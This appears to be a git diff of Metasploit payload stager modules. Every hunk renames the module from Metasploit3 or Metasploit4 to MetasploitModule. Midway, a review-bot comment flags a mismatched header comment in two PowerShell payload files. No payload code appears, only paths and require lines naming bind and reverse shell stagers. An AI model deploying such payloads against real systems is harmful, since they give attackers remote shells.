@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb index 7b16dad82d..921531bf8a 100644 --- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1786 diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb index 524d876cdc..b3dd0e42c7 100644 --- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp_ssl' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1794 diff --git a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb index 75debdbd54..9fd2b45fb2 100644 --- a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 505 diff --git a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb index 0a4ae497bb..d2b1bb8432 100644 --- a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb 
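Review bot: The header comment directly above the renamed module in `modules/payloads/singles/windows/x64/powershell_bind_tcp.rb` still reads `# Extends the Exec payload to add a new user.`, which does not fit a file that requires `msf/core/handler/bind_tcp`. The same comment sits above the module in `powershell_reverse_tcp.rb`, which requires `msf/core/handler/reverse_tcp_ssl`. It looks copied from a different payload, but the module bodies are outside these hunks, so this is inferred from the paths and require lines only. Since the commit already edits the line just below, I would correct the comments here, e.g. `# Windows x64 PowerShell bind TCP payload.` and `# Windows x64 PowerShell reverse TCP (SSL) payload.`, so readers are not misled about what each payload does.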
+++ b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 460 diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index 87b2fbf319..1280aec874 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index fa93d598f4..0198ac0d8b 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index 6aa6aaa3fa..fe1949d130 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb index d6fe01d68c..34c0eab79f 100644 --- a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb 
@@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index defab03f57..d03ccfb2ee 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 54 diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index 5cad0b982e..0eee8c3051 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # BSD find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 40 diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index e295af5b26..5506b36ec0 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 81 diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index e044caaa4f..a09c2f6f68 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 43 diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index d7481715bd..5f6eda8d92 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb 
@@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 69 diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index 054aea36fd..c15d4b32d9 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 59 diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index e68c528b82..d6d8c0e14e 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 5105 diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index f9087ea550..d6a34087cc 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' -module Metasploit3 +module MetasploitModule CachedSize = 5123 diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index 9072228fbd..d58a67ac2f 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = 5932 diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index ca9106a641..9cf7160f42 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb 
+++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 5118 diff --git a/modules/payloads/stagers/linux/armle/bind_tcp.rb b/modules/payloads/stagers/linux/armle/bind_tcp.rb index 1a3e5300e7..963307b1da 100644 --- a/modules/payloads/stagers/linux/armle/bind_tcp.rb +++ b/modules/payloads/stagers/linux/armle/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # Linux bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb index 8876eba6aa..9d5c456f45 100644 --- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # Linux reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 200 diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb index 4f3481455b..081c85e869 100644 --- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 212 diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb index 6274680cd0..b717932d91 100644 --- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 212 
diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index e03be3f9bf..2fe49ef020 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 78 diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index b8adfa1a65..c499229c58 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 68 diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index 0106b03e01..4e0a657788 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 120 diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb index 7b1e53a378..1f50b4d8ab 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 165 diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index 64d035d5b6..64f0c73640 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb 
@@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # Linux bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index d72c328b3e..b49fdd595b 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb index 6ee52b7a80..47e905fb63 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 155 diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index 13f6c4f0ef..967a6965da 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # Linux find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 37 diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index 5812f24621..2dac77ebe7 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' # Linux Reverse TCP/IPv6 Stager -module Metasploit3 +module MetasploitModule CachedSize = 77 
diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index 6f0e0762c6..16c273185e 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # Linux reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 50 diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 6127486d9c..2c2feaf11a 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/linux/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 71 diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb index 3f0d438f87..526e978f0e 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/linux/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 114 diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 43a6199879..cce195a4c3 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 281 diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index a39946b4ea..a65043fada 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb 
@@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # OSX bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 248 diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index e8eb886017..d7e214fed7 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # OSX reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 5932c3309b..4ae1eee45d 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # OSX bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index d2ceeea3e2..f30b0d7bb2 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # OSX find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 76 diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 8bf74f4a68..75b7f06b5c 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # OSX reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 100 diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 5abee59824..aebc72f921 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 185 diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 9a799fbd22..c9976fdb7d 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 154 diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index c058ae14e3..64cc3a4ffa 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Mac OS X x86 bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index 1c2d8d4e69..27dcd36cf6 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp' # Mac OS X x86 Reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 123 diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index f2167c7690..5c283da8a5 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1188 diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index f8d16bb8de..6ebec08930 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1187 diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index bf90de7e90..a01609fac8 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1361 diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 1f8397b4d1..8a7e263464 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1362 diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index 9768010ca5..ffd8f880d7 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/php/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 951 diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index e99e44664a..22d28fa075 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/php/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1125 
diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 113f9b4828..41c763ad2c 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 386 diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb index ec327de75f..88c071564f 100644 --- a/modules/payloads/stagers/python/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 486 diff --git a/modules/payloads/stagers/python/reverse_http.rb b/modules/payloads/stagers/python/reverse_http.rb index 97874d9e5c..59edabedbe 100644 --- a/modules/payloads/stagers/python/reverse_http.rb +++ b/modules/payloads/stagers/python/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http' require 'msf/core/payload/python' require 'msf/core/payload/python/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 494 diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb index bad7e55fea..7e94c41234 100644 --- a/modules/payloads/stagers/python/reverse_https.rb +++ b/modules/payloads/stagers/python/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https' require 'msf/core/payload/python' require 'msf/core/payload/python/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 762 diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 7350a20022..367b3c8693 100644 
--- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 362 diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb index 80b038fdc4..55d36cde14 100644 --- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 466 diff --git a/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb b/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb index 2f3d44d3ce..93c6296129 100644 --- a/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb +++ b/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 359 diff --git a/modules/payloads/stagers/windows/bind_hidden_tcp.rb b/modules/payloads/stagers/windows/bind_hidden_tcp.rb index 8c1bc33ccc..d8586a924c 100644 --- a/modules/payloads/stagers/windows/bind_hidden_tcp.rb +++ b/modules/payloads/stagers/windows/bind_hidden_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 343 diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index 10aeea1af4..ad3e3bc080 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb 
@@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb index 955625dd12..f7f5cf65f7 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 318 diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 0e1bec0085..ee6cf243db 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 201 diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index c59304480d..7a37affda9 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/stagers/windows/bind_tcp_rc4.rb b/modules/payloads/stagers/windows/bind_tcp_rc4.rb index cd50c3b324..e5012d6137 100644 --- a/modules/payloads/stagers/windows/bind_tcp_rc4.rb +++ b/modules/payloads/stagers/windows/bind_tcp_rc4.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 398 diff --git a/modules/payloads/stagers/windows/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_tcp_uuid.rb index bb8326d4f1..1bb216bbc0 100644 
